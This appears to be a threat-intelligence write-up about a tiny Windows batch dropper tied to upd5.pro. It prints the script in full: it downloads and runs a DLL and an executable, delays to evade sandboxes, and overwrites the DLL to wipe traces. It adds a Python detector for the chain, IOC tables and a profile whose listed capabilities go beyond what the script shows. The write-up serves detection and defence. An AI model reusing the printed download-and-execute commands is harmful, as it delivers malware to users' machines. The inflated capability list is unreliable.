Deep Analysis - Dropper BAT (upd5.pro) | Threat: HIGH
File Identity
| SHA256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d |
|---|---|
| Size | 326 bytes - only 326 bytes! Ultra-compact dropper |
| Type | DOS BAT script (Windows Batch file) |
Full Content

```batch
@echo off
echo "-> Loading update 2..."
curl -o 02.dll https://upd5.pro/update/02.dll
rundll32.exe 02.dll,checkit
echo "-> Loading update 2 tool..."
curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe
ping -n 5 localhost > nul
qd_x86.exe
type c:\Windows\System32\conhost.exe > 02.dll
echo "-> Done."
```
Technical Analysis

1. 02.dll is downloaded with curl: https://upd5.pro/update/02.dll
2. rundll32.exe 02.dll,checkit -> the DLL is executed (export: checkit)
3. qd_x86.exe is downloaded with curl: https://upd5.pro/update/qd_x86.exe
4. ping -n 5 localhost -> 5-second wait (sandbox evasion)
5. qd_x86.exe is executed
6. type conhost.exe > 02.dll -> conhost is written over the DLL (trace wiping!)

Domain: upd5.pro -> "update5 pro" = fake update server
Technique: LOLBins (curl, rundll32, ping, type - all built-in Windows tools)
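The six-step chain above is easy to recognise mechanically once a scanner keeps state across lines: a download creates a local file, and later lines that load that file via rundll32, run it directly, or overwrite it are what turn individual LOLBin calls into a dropper signature. The following Python scanner is an added example written for this page, not tooling from the analysis or from any project; the technique labels, regular expressions and scoring rules are this example's own choices, and the sample input is the script content quoted above, treated purely as text and never executed.

```python
import json
import re
from typing import Dict, List

# Constructed sample: the dropper's content exactly as quoted in the analysis.
# It is only scanned as text here; nothing in this file runs it.
SAMPLE_BAT = r"""@echo off
echo "-> Loading update 2..."
curl -o 02.dll https://upd5.pro/update/02.dll
rundll32.exe 02.dll,checkit
echo "-> Loading update 2 tool..."
curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe
ping -n 5 localhost > nul
qd_x86.exe
type c:\Windows\System32\conhost.exe > 02.dll
echo "-> Done."
"""

# Patterns for the four LOLBin uses seen in the chain (assumed, illustrative regexes).
URL_RE = re.compile(r'https?://[^\s"\'<>]+')
DOWNLOAD_RE = re.compile(r'^(?i:curl(?:\.exe)?)\b.*?-o\s+(\S+).*?(https?://\S+)')
RUNDLL_RE = re.compile(r'^rundll32(?:\.exe)?\s+(\S+?),(\w+)', re.IGNORECASE)
PING_DELAY_RE = re.compile(r'^ping\s+-n\s+(\d+)\s+(?:localhost|127\.0\.0\.1)\b', re.IGNORECASE)
TYPE_OVERWRITE_RE = re.compile(r'^type\s+(\S+)\s*>\s*(\S+)', re.IGNORECASE)


def scan_batch(text: str) -> List[Dict[str, object]]:
    """Walk the script line by line, remembering which local files were
    downloaded so that later lines can be judged in that context."""
    downloaded: Dict[str, str] = {}  # lowercased local name -> source URL
    findings: List[Dict[str, object]] = []
    for no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.lower().startswith(("@echo", "echo ", "rem ", "::")):
            continue  # cosmetic output and comments carry no behaviour
        m = DOWNLOAD_RE.match(line)
        if m:
            name, url = m.group(1), m.group(2)
            downloaded[name.lower()] = url
            findings.append({"line": no, "technique": "lolbin_download", "detail": f"{name} <- {url}"})
            continue
        m = RUNDLL_RE.match(line)
        if m:
            dll, export = m.group(1), m.group(2)
            tech = "rundll32_downloaded_dll" if dll.lower() in downloaded else "rundll32_export_call"
            findings.append({"line": no, "technique": tech, "detail": f"{dll}!{export}"})
            continue
        m = PING_DELAY_RE.match(line)
        if m:
            findings.append({"line": no, "technique": "ping_delay",
                             "detail": f"{m.group(1)} echo requests to loopback"})
            continue
        m = TYPE_OVERWRITE_RE.match(line)
        if m:
            src, dst = m.group(1), m.group(2)
            # Overwriting a file the script itself fetched is the anti-forensics step.
            tech = "overwrite_downloaded_file" if dst.lower() in downloaded else "file_copy_via_type"
            findings.append({"line": no, "technique": tech, "detail": f"{dst} <- {src}"})
            continue
        first = line.split()[0].lower().lstrip(".\\")
        if first in downloaded:
            findings.append({"line": no, "technique": "execute_downloaded_file", "detail": first})
    return findings


def assess(text: str) -> Dict[str, object]:
    """Aggregate findings into IOCs and two verdict flags a triage queue can key on."""
    findings = scan_batch(text)
    techniques = {str(f["technique"]) for f in findings}
    # A download followed by loading/running the fetched file is the dropper chain proper.
    chain = "lolbin_download" in techniques and bool(
        techniques & {"rundll32_downloaded_dll", "execute_downloaded_file"})
    return {
        "urls": URL_RE.findall(text),
        "techniques": sorted(techniques),
        "dropper_chain": chain,
        "anti_forensics": "overwrite_downloaded_file" in techniques,
        "findings": findings,
    }


if __name__ == "__main__":
    print(json.dumps(assess(SAMPLE_BAT), indent=2))
```

The stateful approach matters for precision: `ping -n 5 localhost` or a lone `type a > b` in an admin script is noise, whereas `rundll32` pointed at a file the same script just fetched, or `type` writing over that file, is not. The `urls` list doubles as an IOC extractor for the C2 table.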
IOC
| SHA256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d |
|---|---|
| C2 | https://upd5.pro/update/02.dll |
| C2 | https://upd5.pro/update/qd_x86.exe |
| Technique | rundll32 LOLBin, trace wiping (conhost overwrite) |
DropperBAT — Malware Profile
Ultra-compact (326 byte) BAT dropper. Uses LOLBins: curl, rundll32, ping, type. Downloads 02.dll and qd_x86.exe from the fake update server upd5.pro. Trace wiping: overwrites the DLL with conhost.exe.
Malware Type
Loader
Programming Language
Batch
C2 Protocol
HTTPS
Target Systems
Global
Capabilities & Behavior
Payload Download
Process Injection
Modular Architecture
Credential Theft
Lateral Movement
Persistence
Anti-VM/Sandbox
Secondary Payload Delivery
IOC List (3 indicators)
IOC — DropperBAT
# SHA256
3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d
# URL
https://upd5.pro/update/02.dll
# URL
https://upd5.pro/update/qd_x86.exe
| Type | Value | Note |
|---|---|---|
| sha256 | 3b3bd81232f517ba6d65c7838c205b301b0f27572fcfef9e5b86dd30a1d55a0d | |
| url | https://upd5.pro/update/02.dll | |
| url | https://upd5.pro/update/qd_x86.exe | |